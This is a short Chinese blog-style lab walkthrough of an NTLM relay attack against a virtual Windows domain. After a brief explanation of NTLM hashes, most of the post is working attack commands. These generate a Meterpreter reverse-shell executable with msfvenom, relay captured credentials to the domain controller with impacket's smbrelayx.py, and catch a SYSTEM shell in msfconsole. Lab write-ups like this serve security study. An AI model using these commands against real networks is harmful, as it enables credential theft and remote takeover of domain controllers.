其实我不太爱讲原理，不过写了个这个题目，大体也要讲一下NTLM重放攻击是个什么东东，就几句通俗话讲下吧。NTLM Hash：就是里面加密保存了用户密码的 hash。Windows 系统的用户密码被系统加密后保存在 系统的SAM 文件中，如果是域环境则保存在域控制器NTDS.dit 中。Net-NTLM Hash：Net-NTLM Hash 是基于用户密码的NTLM Hash计算出来的，用于在网络环境下 NTLM 认证的 hash。由于SMB、HTTP、LDAP、MSSQL等协议都可以携带NTLM认证的三类消息，所以只要是使用SMB、HTTP、LDAP、MSSQL等协议来进行NTLM认证的程序，都可以尝试向攻击者发送Net-NTLMhash从而让攻击者截获用户的Net-NTLMhash，也就是说我们可以通过这些协议来进行攻击。

我用虚拟机搭建了一个简单的域环境，一台win7做为普通域用户机，一台win2008为域控制器，一台Debian(kali)。

win7:192.168.93.30

win2008:192.168.93.20

debian(kali):192.168.93.128

在kali中我们会用到如下工具：。

kali步骤如下：

1、msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.93.128 LPORT=4444 -f exe -o ntlm.exe （生成一个可以反弹到kali本机的ntlm.exe）

2、进入impacket-0.9.22/examples目录，sudo python3 smbrelayx.py -h 192.168.93.20 -e /home/kali/ntlm.exe(对win2008域控进行重放攻击)。

3、sudo python3 smbrelayx.py -h 192.168.93.20 -e /home/kali/ntlm.exe（进行监听，指定对win2008域控192.168.93.20进行ntlm重放攻击，自动下载执行ntlm.exe）

4、开启msfconsole控制台

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.93.128

set AutoRunScript migrate -f

run

win7机器的域成员，如果此时打开192.168.93.128(kali设的的内部网站)，会有一个提示框：

如果用户警惕性不高，输入了域管理员（或有一定权限的域成员的用户名和密码后）,kali的smbrelayx.py就会有反应了。

同时，我们在msfconsole也会获得192.168.93.20的shell,还是system权限。

值得注意的是msfconsole监听的时候，一定要set AutoRunScript migrate -f（自动迁移meterpreter进程）把这个加进去，我测试时的时候偷了下懒，用了个计算器calc.exe来测试，结果用的工具smbrelayx.py执行完毕后会自动Removing file，一直在进程中没发现calc.exe,没有测试成功。